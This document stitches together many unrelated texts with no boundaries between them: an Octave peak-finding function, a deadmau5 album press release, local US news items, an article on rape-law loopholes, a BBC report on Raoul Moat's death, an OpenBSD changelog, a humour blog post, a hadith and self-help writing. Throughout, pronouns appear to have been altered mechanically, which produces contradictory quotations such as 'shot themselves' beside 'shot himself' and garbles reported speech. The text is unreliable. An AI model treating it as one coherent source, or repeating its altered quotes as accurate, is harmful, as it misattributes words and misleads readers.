function p = find_peaks ( data , num ) cur = data ( 1 ) ; mn = cur ; dir = 0 ; peaks = [ ] ; for i = 2 : length ( data ) s = sign ( data ( i ) -cur ) ; if ( s ! = dir ) dir = s ; if ( dir < 0 ) peaks = [ peaks ; i , data ( i ) ] ; endif endif cur = data ( i ) ; mn = min ( cur , mn ) ; endfor l = rows ( peaks ) ; if ( num > l ) num = l ; endif % Ensure we are using a matrix , otherwise sort treats it as a vector % we should populate this with the minimum value actually ... ( TBD ) if ( l == 1 ) peaks = [ peaks ; 0 , mn ] ; l = 2 ; endif [ spv , spi ] = sort ( peaks ) ; p = [ ] ; for i = 0 : ( num-1 ) p = [ p ; peaks ( spi ( l-i,2 ) , 1 ) , peaks ( spi ( l-i,2 ) , 2 ) ] ; endfor endfunction
The jcampread file can be downloaded from here
OCTOBER 1 , 2014
FR : ALEXANDRA GREENBERG/MSO PR
deadmau5
TO RELEASE ‘ 5 years of mau5 ' –
A RETROSPECTIVE DOUBLE ALBUM NOVEMBER 25
ON MAU5TRAP
Since releasing Random Album Title in 2008 , electronic music producerdeadmau5 's rise to the upper echelons has been nothing short of meteoric . This winter , he 'll release5 years of mau5 , a retrospective double album encompassing highlights from their most beloved back catalog alongside exclusive and new remixes from friends of mau5trap . Just in time for the holidays , 5 years of mau5 will be released November 25 viamau5trap . Further details will be announced soon .
deadmau5 will make their next major U.S. festival appearance on November 1 at HARD Day of the Dead in Southern California . There he 'll join Eric Prydz for a back-to-back performance on their ‘ mau5-ville'– hosted stage . Log on to www.harddayofthedead.com for more information .
Get up close and personal with deadmau5 on live.deadmau5.com .
ABOUT deadmau5 :
Joel Zimmerman , more commonly known as deadmau5 ( pronounced ‘ dead mouse ' ) , is one of the world 's most respected electronic music producers of modern times . Enjoying international chart success with their singles “ Professional Griefers , ” “ Sofi Needs A Ladder , ” “ Ghosts ‘ n ' Stuff ” and “ I Remember , ” they have also released five critically acclaimed albums : while ( 1 < 2 ) , > album title goes here < , 4×4=12 , For Lack Of A Better Name and Random Album Title . The multiple JUNO Award-winning and Grammy®-nominated artist performed at the 54th Annual GRAMMY Awards as part of its first ever telecast performance highlighting electronic music . Their ability to push the boundaries of their talent grows at an equal rate to their fan base , which counts almost nine million on their Facebook page . deadmau5 is also the # 1 selling artist on online retailer Beatport . A major touring act , they have headlined iTunes Music Festival , Lollapalooza , Outside Lands , Budweiser Made In America , Sonar , Virgin Mobile FreeFest , Coachella , Ultra Music Festival , HARD Day of the Dead , and Creamfields , and sold out Rogers Centre in Toronto and PETCO Park in San Diego , as well as multiple consecutive nights at legendary venues like the Roseland Ballroom in NYC and the Palladium in Los Angeles . Plans for a major world tour in 2015 are in now the works . They appeared on the cover of Rolling Stone ( summer double issue , 2012 ) , marking them as the first electronic artist to do so .
www.deadmau5.com
live.deadmau5.com
www.mau5trap.com
www.facebook.com/deadmau5
www.twitter.com/deadmau5
www.deadmau5.tumblr.com
Press Releases & Assets :
www.msopr.com/n/client-roster/deadmau5/
# # #
For more information on deadmau5 , contact :
MSO PR
Alexandra Greenberg 818-380-0400 x223 , agreenberg @ msopr.com
Hamden middle school students learn math by building sailboat
Hamden students learned math and science skills through boat-building . Hamden students learned math and science skills through boat-building . Photo : Ebony Walmsley — NEW HAVEN REGISTER Photo : Ebony Walmsley — NEW HAVEN REGISTER Image 1 of / 9 Caption Close Hamden middle school students learn math by building sailboat 1 / 9 Back to Gallery
HAMDEN > > Sailing on a boat at a country club is not your typical summer school assignment , but two teachers from Hamden Middle School are making it work .
Andrew Marzano , an eighth-grade science teacher , and Frank Kachmar , who teaches technology , teamed up to teach eighth-graders math and science skills by building a sailboat .
Recently , five eighth-graders set sail on a pond at the Hamden Paradise Country Club using two 12-foot skiffs .
Marzano said they wanted to bring the idea to the middle school after watching people build wooden boats at Mystic Seaport .
“ It really incorporates math , science , history and English , ” Marzano said .
The three-week program caters to students who face challenges with math and science , teaching them about angles , measurements and adding and subtracting fractions .
“ These students work better with their hands , rather than a pencil and notebook , ” Marzano said .
While students may not initially understand the benefits to constructing firsthand , Marzano said that , once the end result is pieced together , the excitement builds .
“ They start to see it 's not just a hammer and nails , but that it 's actually something functional , ” Marzano said .
Student Michael Cox said building the sailboats was a great experience .
“ I loved doing it . We had to learn about how to correctly measure the boats and its seats or they 'd be too big , ” Michael said .
While Michael enjoyed the building process , they said the trade is something he 'd only be interested in as a hobby .
Other students who helped build the boats included Ethan Dileone , Elijah Garcia , James Flores and Brendan Randall .
Kachmar said the students participated in every part of the process from reading the construction plans to hammering and sanding the boat .
“ I was most impressed with how quickly they learned how to read the drawing plans and their ability to create something out of raw materials , ” Kachmar said .
Kachmar said the experience gives students the chance to move out from behind the books and get excited about learning .
“ We provide the opportunity for them to become enthusiastic and they supply the motivation for themselves later on in life , ” Kachmar said .
Marzano hopes to expand the program to allow students to participate throughout the entire year .
“ I want the ones that are n't showing up . It takes them out of a traditional classroom setting . ... I think there 's enough enthusiasm for it , ” Marzano said .
Hamden Middle School Principal Dan Levy said they would like to see the project grow , but said it has to start small .
“ It 's enriching for kids . You know , they can talk about angles or you can build them on a boat , ” Levy said .
As they watched two students climb into a boat , Levy admired their craftsmanship .
“ That 's a beautiful watercraft right there . A 13-year-old built that ; that 's awesome , ” Levy said .
Call Ebony Walmsley at 203-789-5734 . Have questions , feedback or ideas about our news coverage ? Connect directly with the editors of the New Haven Register at AskTheRegister.com .
On March 24 , an Oklahoma appeals court unanimously ruled that “ forcible sodomy can not occur where a victim is so intoxicated as to be completely unconscious at the time of the sexual act of oral copulation ” ( PDF ) . Translated into English : Forcing a woman to perform oral sex while she 's blackout drunk is n't raped .
Oklahoma Watch first reported the shocking decision , which Tulsa County assistant district attorney Benjamin Fu called “ dangerous ” and “ offensive. ” Fu served as the lead prosecutor in a case against a 17-year-old boy who claimed in a police interview that a 16-year-old girl they drove home from a park had consented to oral sex . The girl said they did not remember what happened and another boy who rode in the car confirmed that they were having difficulty staying conscious . After they were taken to the hospital early the next morning , tests showed that their blood alcohol level was a staggering .341 and that traces of the boy 's DNA were around their mouth .
But because they were intoxicated—and because the alleged rape was oral rather than vaginal—the court determined that Oklahoma law did not apply to their case . Oklahoma 's “ rape in the first degree ” statute is fairly comprehensive , applying to victims who were mentally ill , intoxicated , unconscious , physically coerced , or threatened with violence . But the “ forcible sodomy ” statute only lists two barriers to consent : mental illness and violence . The difference between the statutes might seem like a technicality , but it 's one that the appeals court took seriously , writing that they could not “ enlarge a statute ” in order to prosecute the boy .
More alarming than this conclusion is the fact that these bizarre loopholes and double standards in rape legislation are n't just confined to one state .
As of 2013 , the FBI defines rape as “ penetration , no matter how slight , of the vagina or anus with any body part or object , or oral penetration by a sex organ of another person , without the consent of the victim. ” The agency 's prior definition— “ the carnal knowledge of a female forcibly and against them will ” —was not only archaic , it was ambiguous about what , precisely , counted as rape : Did “ carnal knowledge ” include oral rape , anal rape , rape with an object ? But even though the federal government has now laid out a crystal clear and expansive definition of rape , several states—not just Oklahoma—still regard nonconsensual vaginal penetration with a penis differently from other , equally serious forms of forcible sex .
As Jennifer Gentile Long , CEO of AEquitas , a resource for prosecutors in cases of violence against women , told The Guardian of the Oklahoma case , “ There are still gaps in the ways laws are written that allow some cases to fall through the cracks . This case seems to be one of them . ”
Georgia , for example , has a separate “ aggravated sodomy ” statute that covers “ any [ nonconsensual ] sexual act involving the sex organs of one person and the mouth or anus of another. ” But the state takes “ rape , ” which it defines solely as vaginal intercourse , more seriously .
Georgians convicted of rape can be executed or sentenced to life in prison without parole . Those convicted of “ aggravated sodomy , ” on the other hand , can only get a maximum punishment of life with parole . Both are serious penalties but the slight difference between them sends the message that vaginal rape is a more serious offense than anal or oral rape .
Kansas 's rape law contains language aimed at offenders who deceive their victims into believing that vaginal penetration—whether by a penis , a finger , or an object—is “ a medically or therapeutically necessary procedure ” like a medical exam or a “ legally required procedure ” like a cavity search . That specific protection is absent from its “ aggravated criminal sodomy ” law for oral and anal contact or penetration .
Oregon state law makes subtle distinctions between sexual offenses based on what the offender used for the nonconsensual penetration . The state 's criminal code has virtually identical “ rape ” and “ sodomy ” legislation but it also contains a third category of “ unlawful sexual penetration ” that only applies if the penetration is done “ with any object other than the penis or mouth of the actor . ”
Oregon 's first-degree rape and sodomy statutes contain language designed to prevent child sexual abuse , automatically defining the offender 's siblings , half-siblings , children , or stepchildren as victims if they are under the age of 16 . But the “ unlawful sexual penetration ” statute for sexual offenses committed with an object strangely lacks that language .
The loopholes do n't end there . Some states even dole out different punishments or have different standards of force for marital rape , as The Daily Beast reported last June . Ohio state law , for example , still technically allows a husband to drug and have nonconsensual sex with their wife . A bill to address this situation is still pending .
This week , Oklahoma lawmakers are rushing to close their own “ forcible sodomy ” loophole now that it has been exposed but , around the country , others remain , with possible judicial disasters lying in wait .
TimesApp is perfect for people who are seeking an web app to allow them keep tracking their time , focused on freelancers and small business . We know there are a lot of projects that do the same dammit thing , but you know ? This project it 's completly free of charge and Open Source under MIT License . So , What are you waiting for to try ?
A dashboard to rule them all !
Dashboard let 's you know whats going on with one look .
Make your time count
Track the time you spent working . Now you got several ways to add your time with the build in timer , by hand or even with the client app for Android devices .
Create your own presets
Times App allows you to create three different presets to make your invoicing process easier . Taxes , Services and Products .
Do n't waste your time on boring stuff
Create invoices from existing projects or from scratch , send them via email to your clients or export them to PDF format , add payments and more at just a few clicks away .
Following a recent upgrade , the USC-Lockheed Martin Quantum Computing Center ( QCC ) based at the USC Information Sciences Institute ( ISI ) is now the leader in quantum processing capacity .
With the upgrade — to 1,098 qubits from 512 — the D-Wave 2X processor is enabling QCC researchers to continue their efforts to close the gap between academic research in quantum computation and real-world critical problems .
The new processor will be used to study how and whether quantum effects can speed up the solution of tough optimization , machine learning and sampling problems . Machine-learning algorithms are widely used in artificial intelligence tasks .
“ Our QCC researchers have been studying and elucidating the capabilities of the D-Wave quantum annealing processors since 2011 , starting with the first commercially released model , and we are fortunate to be able to continue this cutting-edge work with this new , third-generation model , ” said Daniel Lidar , the scientific director of the USC-Lockheed Martin Quantum Computing Center .
The QCC is hosted at the USC Information Sciences Institute of the USC Viterbi School of Engineering . The QCC hosts one of two D-Wave systems that currently operate outside of D-Wave 's headquarters ; the other , owned by Google , is hosted at NASA 's Ames Research Center . A third is being installed at Los Alamos National Laboratory .
“ Research advances and new insights from the quantum computing research group at ISI have , over the past few years , re-shaped the national conversation about quantum computing . This significant new upgrade provides an even more powerful platform for the group to push the boundaries of quantum computing , ” said Prem Natarajan , the Michael Keston Executive Director of the USC Information Sciences Institute .
“ Quantum computing has the potential to solve complex engineering problems that classical computers can not efficiently solve , ” said Greg Tallant , Lockheed Martin fellow and lead for the USC-Lockheed Martin QCC . “ This emerging technology is expected to achieve things like rapidly debugging millions of lines of software code and solving hard computational problems in the aerospace industry . At its fullest capability , quantum computing could advance the way we solve critical issues and plan for future generations . ”
The QCC researchers expect that with continued development , the D-Wave 2X system will enable breakthrough results in quantum optimization .
More stories about : Engineering , Viterbi School of Engineering
Catching up to current .
Do n't let windows fall off the end of the world in calmwm .
Remove last remnants of rtsol in the intaller , netstart , everywhere .
Allow setting of guest MSRs from vmd , a prerequisite for migration . Also add support for reading and writing device state .
Use freezero in many places in libcrypto .
Resynchronize the guest RTC via vmmci when the host resumes from suspend . Only for OpenBSD guests .
Provide pluggable queueing interface for pf , hiding H-FSC behind an abstraction layer . What could be next ?
Revise octeon MDIO driver . Lets all the ethernet ports on the EdgeRouter Pro work .
Introduce an inline function sstosa to convert struct sockaddr_storage to struct sockaddr in a typesafe manner instead of sprinkling casts everywhere .
Add an implementation of the Flow Queue - Controlled Delay ( FQ-CoDel ) .
Changes and fixes to support the eMMC controller on the Rockchip RK3399 . Plus rkgpio , a driver to Rockchip GPIO pins .
Reference counts the tls_config object . This makes it easier for applications to use and reason about its lifetime .
Improve mandoc with a basic implementation of the roff .ta ( define tab stops ) request . This is the first feature made possible by the parser reorganization . Improves the formatting of many Xenocara GL and ports manuals . Also add .ti ( temporary indent ) request .
Something about tmux and xterm and arrow keys and vi and it 's all terribly weird . But pressing up works now .
Remove support for the Blowfish , RC4 and CAST ciphers from ssh . Refuse RSA keys < 1024 bits in length .
Print arguments in kernel stack traces on amd64 , using the recently added -msave-flags compiler option .
The early stages of a flag for drivers to indicate they are capable of 64 bit DMA .
The driver that gets all the fixes , iwm , gets more fixes . Some other wifi drivers get fixes , too .
Fix exponential handling of wildcards in glob to be less recursive .
The octeon does n't have a bootloader to provide entropy to the kernel , but we can mix bits from the built-in RNG with the randomdata section very early in the kernel startup . Some commentary .
Enable ( emulated ) TLS ( thread local storage ) support in clang by default .
Fixes for out of bounds writes in freetype .
Make AES-NI feature detection work in the RAMDISK .
Split uvm_km_page_init into early and late stages to avoid recursive dependencies where allocating memory required allocating memory required allocating memory . Bootstrapping is hard .
At long last , fix the problem where keystrokes would be lost with some server 's emulated USB keyboard . DDB does n't need to steal keystrokes until we 're in the debugger .
Start providing atomic variants of copyin and copyout for use by the futex code .
The nvme driver reported disk sizes one sector too large . Your partition table may be incorrect .
The NET_LOCK is back in . Fasten your seatbelts .
Try to do better things with UTF-8 characters at the ksh command line .
A new warning level , style , for mandoc . This is the new default .
More algorithmic improvements to standard libc functions , this time qsort . First , a simple optimization to recurse down the smaller partition . Saves a bit of stack . Next , introsort is 20 years old now , so maybe it 's time to switch . This finally eliminates worst case performance even with inputs designed to be unpleasant . More details in the thread .
Admit to the existence of the # openbsd irc channel on freenode .
Add radeon drivers to the loongson port .
Bonus thread : “ I have four UTF-8 capable X terminals here and between them they do three different things. ” Plus some messages in that thread .
Ok , to start with…No , no you are not .
I 've known quite a few males who have uttered this statement to me when they find out they are having a baby . “ We are pregnant ! ! ” . I have been genuinely happy for them . However , the happiness is always tinged by a touch of revulsion at the statement . I can definitely say that I feel happier for other people who have chosen the far less emasculating “ We 're having a baby ” or , “ My wife is pregnant ! ” .
I do n't know why this statement fills me with disgust . I 'd say I like hearing that statement as much as I 'd like to hear the words “ Administer rectally ” from my doctor . I 'm fairly certain that these same men do n't go around proclaiming “ We are having our period ” or “ We 're staying in to watch Lifetime tonight ” . Well , maybe some of my friends would say that last one .
To be honest it sort of feels like they are stealing some of the thunder from the woman who is actually pregnant . They are the ones who are about to go through the ordeal of pregnancy and need to cope with the myriad of issues involved with it . Physical and emotional changes , keeping track of what 's happening to ensure good health , hot/cold/hot/ super hot flashes , potentially becoming suddenly allergic to foods ( shellfish and cooking in my wife 's case ) , aching backs/feet and the biggest hit…no booze ! ! ! Meanwhile , the worst thing we men have to watch out for is late night food requests ( honey , do you know anyplace that serves Moo Shu Pork , venison and Blueberry Brownies at 3 am ? ? ) and a touch of the batshit crazies here and there . We ca n't go around claiming that we are pregnant because of it ! If anything we come out way ahead in so many ways ! Just think , no more arguments over who is going to drive home from your friends ' barbeque . 9 months of free designated driver duties ! ! ! !
So , the next time a friend cracks a celebratory beer , smiles broadly and announces “ We are pregnant ” , I suggest you wind up and punch them directly in their “ baby-laden vagina ” . Hopefully this will remind them that while they are a major part of this , they are not actually with child .
Do n't like ads ? Become a supporter and enjoy The Good Men Project ad free
—
This post and photo was reprinted from Life of Dad .
Last year , I put together a body-positive coloring book called “ Big-Bellied Merbabes. ” It was a project inspired my obsession with mermaids and “ Fat Ladies in Spaaaaace ” by Theo Nicole Lorenz . It was mostly a low-stress project for fun , as most of the design and illustration work I 'd done that year did not allow for much creativity . I rounded up a bunch of my friends to model for me , printed out a bunch of copies , and spent some quality time with a long reach stapler .
I figured I 'd just sell a few copies at my artist alley table at GeekGirlCon '13 and gift the rest to friends . I ended up selling out of my first run of copies by the end of October ! I was not expecting the coloring books to receive such a tremendous response . Just goes to show how thirsty we are for body-positive media !
Fast forward a year later when I received a message from a friend ( who had previously told me they were using the coloring books to teach body diversity in their class ) saying they were offering extra credit to students in exchange for a colored page from the book ! I wanted to share a few of my favorites :
How awesome are these ? ! I 'm so stoked that this coloring book is being used as a tool to teach kids about body positivity ! Hope you enjoy these as much as I did !
Advertisements
Fugitive gunman Raoul Moat has killed themselves after a six-hour stand-off with armed officers , police have confirmed .
A spokesperson said the 37-year-old shot themselves after being cornered close to a river in Rothbury , Northumberland . They were pronounced dead in hospital at 0220 BST on Saturday .
It has emerged police used a Taser stun gun on Moat .
Officers had been negotiating with Moat , who was spotted near the centre of Rothbury after a week-long manhunt .
Eyewitness Peter Abiston , whose house overlooks the scene of the incident , told the BBC : `` From what I can see they shot himself . They lay down and shot himself .
Image caption Moat was earlier seen pointing a gun at their own neck Moat was earlier seen pointing a gun at their own neck Timeline : Tyneside shootings case Witnesses ' reports from Rothbury Return to normality for Rothbury
`` I think there was two , but there was certainly one shot . ''
Other local people overheard some of the negotiations that took place between Moat and the police before they apparently turned their gun on himself .
A guest-house owner , who did not want to be named , told the BBC : `` He actually said , the one thing that sticks in my mind , ' I have n't got a dad ' ... and they also said that , 'nobody cares about me ' . ''
Police said Moat , a former nightclub bouncer and father-of-three , shot themselves at about 0115 BST .
After a gunshot was heard , shouts were heard from officers close to Moat . One was heard to yell several times , `` Put that gun down '' .
Paramedics were quickly on the scene and Moat was taken by ambulance to Newcastle General Hospital - accompanied by two police cars - but died shortly after arriving .
'Difficult time '
Officers discovered Moat on the riverbank by the River Coquet at about 1900 BST on Friday .
Expert negotiators were brought in to speak to him , and unconfirmed reports suggested a friend of Moat was also brought inside the police cordon to try to persuade them to surrender .
Because police had contact with Moat prior to their death , the incident has been referred to the Independent Police Complaints Commission .
There will be lessons learnt here , good and bad on various aspects Andy Redhead , Former police firearms adviser
Northumbria Police Temporary Chief Constable Sue Sim said : `` While the incident has been brought to a close we must be mindful of the impact it has had on many lives .
`` Our thoughts are with the family and friends of those affected .
`` I 'd like to thank the public , particularly the community of Rothbury , for their continued help throughout the inquiry .
`` This has been a difficult time for them and their support has been invaluable . ''
An IPCC spokesperson said its investigation would look specifically at whether the State did all it could to prevent loss of life .
They said this would include taking witness statements from those involved in the negotiations .
A post-mortem examination will also be carried out to confirm the cause of Moat 's death and what sort of gunshot wound they suffered .
The IPCC report and the post-mortem findings will both be sent to the coroner who will hold an inquest into the death at a later date .
A forensic examination of the scene where Moat died was ongoing on Saturday . The investigation was also focussing on an area close to a culvert near the River Coquet , where it is thought Moat had hidden from searchers .
Sir Alan Beith , Lib Dem MP for Berwick upon Tweed , which includes Rothbury , said the police faced `` key questions '' about the police investigation into Moat .
Image caption A forensics tent has been erected at the scene where Moat shot themselves
They added : `` The people of the Rothbury area coped superbly with a difficult and dangerous situation and everyone is relieved that it is over .
`` Key questions will now have to be investigated by the IPCC , but local people were keen throughout to support the police .
`` The first objective now is to get back to normal and welcome visitors and tourists back to this beautiful area . ''
The BBC 's Jon Sopel , who is in Rothbury , said : `` There is a sense of relief here that people can go on with their lives in safety .
`` But there is still a police cordon in place and forensic teams are still trying to work out where exactly Raoul Moat was hiding .
`` So effectively Rothbury is a town cut in two at the moment . Life still has n't got back to normal quite yet and I suspect it may not do for some time to come . ''
Former police firearms adviser , Andy Redhead said : `` All the officers involved in this operation are relieved that it 's over .
`` And I dare say there is also an element of disappointment that Mr Moat was not persuaded to put the weapon down and surrender .
`` I think with any police investigation of this magnitude there are always going to be lessons learnt . There will be lessons learnt here , good and bad on various aspects . ''
Police grudge
Moat had been on the run for a week after allegedly shooting their ex-girlfriend Samantha Stobbart and killing their new partner , Chris Brown .
The attacks took place in the Scafell area of Birtley , near Gateshead , on Saturday 3 July .
In the early hours of Sunday 4 July , Moat is alleged to have shot Pc David Rathband as they sat in their patrol car in East Denton , near Newcastle .
Moat was released from prison on Thursday 1 July .
Northumbria Police said they appeared to have a grudge against the force and in a letter purportedly written by him , they threatened to keep shooting officers until they were dead .
Police later warned of a wider threat to the public .
Image caption Moat is believed to have hidden in a culvert in Rothbury
Jon Sopel said that warning followed the discovery of a dictaphone in a tent used by Moat .
They said the dictaphone contained four hours of recordings in which Moat said they were unhappy with the way details of their private life were being reported and unless that stopped they would start targeting members of the public .
It also emerged Moat had indicated to police they had `` significant unhappiness '' with what they considered to be misreporting by the media and believed the police were manipulating the media deliberately .
Police said they threatened to harm members of the public for each inaccuracy they perceived .
Psychologists also concluded there was a `` high risk '' that Moat would be responsible for future violent conduct .
The focus of the manhunt moved to Rothbury when a black Lexus car , which Moat was thought to have been using , was discovered in the town on Tuesday .
Police imposed a 10-mile ( 16km ) exclusion zone around the town and armed officers from forces across the country were brought in to assist in the search .
Allah 's Apostle said , `` Allah has some angels who look for those who celebrate the Praises of Allah on the roads and paths . And when they find some people celebrating the Praises of Allah , they call each other , saying , `` Come to the object of your pursuit . ' `` They added , `` Then the angels encircle them with their wings up to the sky of the world . '' They added . `` ( after those people celebrated the Praises of Allah , and the angels go back ) , their Lord , asks them ( those angels ) -- -- though They know better than them -- -- 'What do My slaves say ? ' The angels reply , 'They say : Subhan Allah , Allahu Akbar , and Alham-du-li l-lah , Allah then says 'Did they see Me ? ' The angels reply , 'No ! By Allah , they did n't see You . ' Allah says , How it would have been if they saw Me ? ' The angels reply , 'If they saw You , they would worship You more devoutly and celebrate Your Glory more deeply , and declare Your freedom from any resemblance to anything more often . ' Allah says ( to the angels ) , 'What do they ask Me for ? ' The angels reply , 'They ask You for Paradise . ' Allah says ( to the angels ) , 'Did they see it ? ' The angels say , 'No ! By Allah , O Lord ! They did not see it . ' Allah says , How it would have been if they saw it ? ' The angels say , 'If they saw it , they would have greater covetousness for it and would seek It with greater zeal and would have greater desire for it . ' Allah says , 'From what do they seek refuge ? ' The angels reply , 'They seek refuge from the ( Hell ) Fire . ' Allah says , 'Did they see it ? ' The angels say , 'No By Allah , O Lord ! They did not see it . ' Allah says , How it would have been if they saw it ? ' The angels say , 'If they saw it they would flee from it with the extreme fleeing and would have extreme fear from it . ' Then Allah says , ' I make you witnesses that I have forgiven them . '' ' Allah 's Messenger ( ﷺ ) added , `` One of the angels would say , 'There was so-and-so amongst them , and they were not one of them , but they had just come for some need . ' Allah would say , 'These are those people whose companions will not be reduced to misery . ' ``
The key idea in life design is that you do n't get stuck on something that you have effectively no chance of succeeding at all . Designing your life and living a life that you truly want is attainable if you accept reality . The author goes on to say , “ We are all for aggressive and world-changing goals . Please do fight City Hall . Oppose injustice . Work for women 's rights . Pursue food justice . End homelessness . Combat global warming . But do it smart . If you become open-minded enough to accept reality , you 'll be freed to reframe an actionable problem and design a way to participate in the world on things that matter to you and might even work . ”
What did you dream of doing or becoming when you were a child ?
What are you not happy about right now ?
Is there a way to improve your life ?
These are some of the key questions we forget to ask ourselves . The growing number of responsibilities and repetitive lifestyles made us lose control over our lives . We no longer get to choose what we do or who we become . Most of the time we are either being told to or running on autopilot . Living a successful life means living on your own terms . You set the rules and you get to decide . Designing your life starts where you are NOT where you wish you were . Not where you think you should be . But right where you are today .
# 3 Bust The Myths Of Ageing and Stay Forever Young
Negative stereotypes about getting older can become a self-fulfilling prophecy . In ‘ To Age Well , Change How You Feel About Aging ' published by The Wall Street Journal states that : “ In test after test , researchers are finding that if we think about getting older in terms of decline or disability , our health likely will suffer . If on the other hand , we see ageing in terms of opportunity and growth , our bodies respond in kind. ” The first step to ageing gracefully is to have the correct mindset and understand the difference between the myths and facts on ageing .
Last night I watched Secret 's of Henry VIII 's Palace , a documentary about Hampton Court . ( The party animal that I am ! ) The tour of the premises included the permanent residents of the palace 's Great Hall , known as “ eavesdroppers ” .
As shown in the photo here , eavesdroppers are carved wooden figures tucked into the “ eaves ” , the overhanging edges of the beams in the ceiling .
These curious characters were more of a warning than decoration . Eavesdroppers were gossip stoppers that smiled down on guests . Hampton Court was an enormous palace but with hundreds of residents , staff , and guests , space , and privacy , were at a premium . The walls had ears . In those Tudor Times of intrigue and unrest , where traitorous words could result in hanging , drawing , and quartering , or if you were lucky , just losing your head , these eavesdroppers were a grim reminder that you were always being watched and heard by courtiers and servants . In the Tudor court it was best to see nothing , hear nothing , and say nothing .
“ Eavesdropper ” comes from the Old English yfesdrype , that meant , “ place around the house where the rainwater drips off the roof. ” The word appears around the 1500s as a name for people who lurked under the eaves of a house to overhear what 's going on inside . The verb form , to “ eavesdrop ” , did n't appear until a century later , and is a shortening of “ eavesdropper. ” ( This type of neologism is called a “ back-formation ” where a new , shorter word is created from an existing one , e.g. , “ burgle ” came from “ burglar ” , and “ diagnose ” from “ diagnosis ” . )
Today , eavesdropping is n't only about hiding behind the curtains as we can eavesdrop over the telephone ( wiretapping ) , via email , instant messaging , and other methods of private communication . If a message is broadcast publicly , witnessing it does n't count as eavesdropping . We could also listen in to the guys at the next table in the pub bragging about their conquests of the previous night and call that “ eavesdropping ” because the conversation is n't intended for our ears ( or perhaps it is ! )
Typically , eavesdropping has the connotation that we 're listening in secret , without permission or knowledge of the speakers . Eavesdropping also implies that we know the speakers , and are invested personally in what they have to say , which is possibly about us . Also , we 're probably not expecting to hear praise or compliments . As the old adage goes , eavesdroppers seldom hear anything good about themselves…
Share this :
Tweet
Like this : Like Loading ...
Searcy County Sheriff Kenny Cassell is losing their job due to a misdemeanor they committed in 1979.A circuit judge has filed an order removing them after the Arkansas Supreme Court found Cassell 's 1979 conviction for possessing stolen hens made them ineligible to serve . `` We 've never dealt with it before , '' said Dewayne Pierce , chief deputy at Searcy County Sheriff 's Office.Pierce is now acting sheriff . `` During the appeal process it was kind of in everybody 's mind , '' Pierce said . `` However , it does n't hit you until it happens . `` Cassell has been through the court system over the past few years , after the county prosecutor moved to remove them from office , citing a federal misdemeanor for possession of stolen Cornish hens in 1979 . `` When they decided to run they said ' I got into some trouble when I was a kid , ' '' their son , Cody Cassell , said . `` When they started to run , I was the age then they were when they got in trouble so I kind of understood . I was like we all did stupid things . `` Cody Cassell , 25 , said the hens are a sore subject.After the circuit court ruled Cassell could keep the job in 2012 , the prosecutor appealed the decision.The Arkansas Supreme Court upheld the appeal . `` I was hurt obviously because it 's my dad but , like I said , there are rules you got ta follow so you just have to keep your chin up and move on , '' Cody Cassell said.Kenny Cassell declined an on camera interview but did tell Channel 7 they have been shocked by the whole ordeal , and never thought the incident would come back up.He added it 's a reminder that everyone is accountable for their actions . `` It 's upsetting that it has to follow you around but that 's life , I guess , '' Cody Cassell said . They added the community is upset and wants to see the right person fill the job . Cody , a county probation officer , is throwing their name in the hat as a candidate for sheriff.Six others have declared their intention to be considered : Jasper W. Treece , Paul Ray Jones , Paul A. Toby Long , V.L . Red McElroy , Donald Ragland and Eddie Whitmire.The Searcy County Quorum Court will appoint the next sheriff from the applicants . They are set to meet Wednesday at 5:00 p.m .
Unlike the 505-acre Pearsall Park that will open a skatepark , playground , zip lines , and marathon tracks in the Southwest Side this weekend , most District 9 's 204-acre park will show off the natural landscape with simple hike and bike trails and impressive views of the Texas Hill Country .
The City plans to use $ 5.3 million in Edwards Aquifer Protection Program funds and $ 1 million from the district 's Hardy Oak Extension to purchase the first 165.3 acres from the Classen-Steubing family . The land is located above Edwards Aquifer recharge zone near the intersection of U.S. Highway 281 and Loop 1604 .
A second , smaller portion of land will eventually host six sports fields and Councilman Joe Krier ( D9 ) hopes to get $ 3.8 million from the City 's 2017 Municipal bond to purchase the remaining 38.7 acres of the former ranch land . The Classen-Steubing family has owned property in the area since the 1800s .
Krier was joined by Mayor Ivy Taylor ; Francine Romero , associate dean for the College of Public Policy at UTSA ; and various city officials on Tuesday to announce plans for the yet-to-be-named park in their district and one of the few remaining undeveloped tracts of land in San Antonio 's far Northside .
“ This is a great opportunity for the City of San Antonio , ” Taylor said . “ This land 's natural beauty … is stunning and it sits over our Edwards Aquifer recharge zone . The acquisition will keep the land from being ( used ) for residential development . That means that as many as 3,500 houses and apartments that could have been built on this site , wo n't be . ”
Concerns over the rate of population growth , the school districts ' ability to keep pace , and ensuring future water supplies have city leaders taking long , critical looks at land use in the Northside . The opportunity to buy an untouched piece of land to create a park , which will also protect a huge area of the aquifer recharge zone , was an opportunity that City officials could n't pass up .
“ The purchase will protect San Antonio 's largest source of drinking water and it will also help with the area 's roadways , ” Mayor Taylor said , “ and it 'll also assist the North East Independent School District and relieve the pressure of added development . ”
City Council is expected to vote on the $ 5.3 million Prop 1 allocation at its June 16 meeting . The $ 3.8 million ask will likely to go voters as part of the 2017-2022 bond package – provided it makes it onto the final list .
This latter acquisition would provide space for public soccer and baseball fields , which Councilman Krier said are needed in the area .
“ 100 years from now nobody in San Antonio will say , ‘ How did you all get this land ? How much did you pay for it ? ' But they will say , ‘ Thank heavens that leaders in San Antonio in 2016 had the vision and leadership and the commitment to make this park happen , ' which generation after generation of San Antonians will enjoy , ” Krier said .
Robert Schlortt , a member of the Classen-Steubing family , spoke about their childhood memories spent playing on the ranch and the family 's desire to see the land used as a park for many years to come .
“ We trust the City of San Antonio Parks and Recreation Department to take care of this land . I have seen firsthand the commitment the city places on parks and recreation areas . I believe there could be no better flight attendant for this land for the future , ” Schlortt said . “ Most of all , I want to thank the voters of San Antonio for having the foresight to proactively protect the aquifer through the Edwards Aquifer Protection Program . ”
The park project is vital to preserving and protecting the Edwards Aquifer recharge zone from encroaching development , Romero said . This particular parcel of land is especially important to the aquifer .
“ The aquifer potential here is amazing . There are different ratings for aquifer recharge land and this one had the only ‘ Exceptional Quality ' aquifer recharge that I 've ever seen , ” Romero said . “ The size , the proximity to development and how important it is to recharge are all exciting ( aspects ) . ”
Krier said the possibilities for eco-friendly construction of the park 's low-impact features are endless . Although no design plans have been formally discussed , Krier is looking forward to exploring water-conservation projects like rainwater collection systems that would work in tandem with aquifer conservation .
City officials also announced plans for a bike route that would connect the 250-acre Stone Oak Park with the new park to make nearly 500 acres of public green space available to San Antonians through the linear connection . City leaders are hopeful that most public parks and greenways , from south San Antonio , through downtown and up to the Northside , will eventually connect through an “ emerald necklace ” created by the Howard Peak Greenway Trail System .
